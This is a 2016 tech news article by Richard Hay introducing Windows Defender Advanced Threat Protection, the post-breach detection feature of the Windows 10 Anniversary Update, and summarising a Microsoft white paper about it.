Resource: Using Windows Defender Advanced Threat Protection After a Breach

Windows Defender Advanced Threat Protection will provide Enterprise users with the tools to investigate and deal with attacks on their networks.

Richard Hay, Senior Content Producer

August 8, 2016

2 Min Read
Resource: Using Windows Defender Advanced Threat Protection After a Breach

One of the new features we have told you about in the Windows 10 Anniversary Update, which was released earlier this month, is Windows Defender Advanced Threat Protection (ATP).

The idea behind ATP is that with the constantly changing threat landscape and despite our best efforts it may be impossible to protect company networks 100% so it is important to know when a network has been breached. That awareness can then be used to look into the attack, find out its specific vector and remediate the weak spot it came in through.

It also allows an organization to know there has been a breach and find out what data, if any, has been compromised otherwise companies may have intruders in their networks for days, weeks, months and sometimes years before they know it happened.

As mentioned above, these ATP features are new to the Anniversary Update for Windows 10 so it is likely that many organizations are not actively using ATP beyond small scale testing of the OS update itself.

For those of you still considering your options for migrating to Windows 10 in the future a new white paper from the Windows Security Center will give you background on how this post-breach feature works.

"Unlike pre-breach, post-breach assumes a breach has already occurred – acting as a flight recorder and crime scene investigator (CSI). It monitors security events on the endpoint and leverages large scale correlation and anomaly detection algorithms to alert on evidence of an ongoing attack. Post-breach leverages the attacker’s need to perform multiple actions after the initial breach, such as performing reconnaissance, hiding and moving across the network to locate high-value assets, and executing information extraction. Post-breach provides security teams the information and toolset needed to identify, investigate, and respond to attacks that otherwise will stay undetected and below the radar. Finally, postbreach closes the loop back to pre-breach antimalware and other prevention capabilities by feeding them with missed signals and samples. As such, it complements the pre-breach security solution stack."

The five page PDF document breaks down into the following areas about ATP:

  • A new challenge emerges

  • The post-breach approach

  • The Windows post-breach solution

    • Advanced threat detection

    • Investigation and response

    • Threat intelligence

    • Integrated solution

  • Windows 10 defense stack

This document is well worth your time to read and learn more about ATP and how Microsoft plans to change the approach to breaches with this new feature in the Anniversary Update.

But, wait...there's probably more so be sure to follow me on Twitter and Google+.

----------------------------------

Looking for an awesome, no-nonsense technical conference for IT Pros, Devs, and Devops? Check out IT/Dev Connections!

IT/Dev Connections

About the Author

Richard Hay

Senior Content Producer, IT Pro Today (Informa Tech)

I served for 29 plus years in the U.S. Navy and retired as a Master Chief Petty Officer in November 2011. My work background in the Navy was telecommunications related so my hobby of computers fit well with what I did for the Navy. I consider myself a tech geek and enjoy most things in that arena.

My first website – AnotherWin95.com – came online in 1995. Back then I used GeoCities Web Hosting for it and WindowsObserver.com is the result of the work I have done on that site since 1995.

In January 2010 my community contributions were recognized by Microsoft when I received my first Most Valuable Professional (MVP) Award for the Windows Operating System. Since then I have been renewed as a Microsoft MVP each subsequent year since that initial award. I am also a member of the inaugural group of Windows Insider MVPs which began in 2016.

I previously hosted the Observed Tech PODCAST for 10 years and 317 episodes and now host a new podcast called Faith, Tech, and Space. 

I began contributing to Penton Technology websites in January 2015 and in April 2017 I was hired as the Senior Content Producer for Penton Technology which is now Informa Tech. In that role, I contribute to ITPro Today and cover operating systems, enterprise technology, and productivity.

https://twitter.com/winobs

Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.

You May Also Like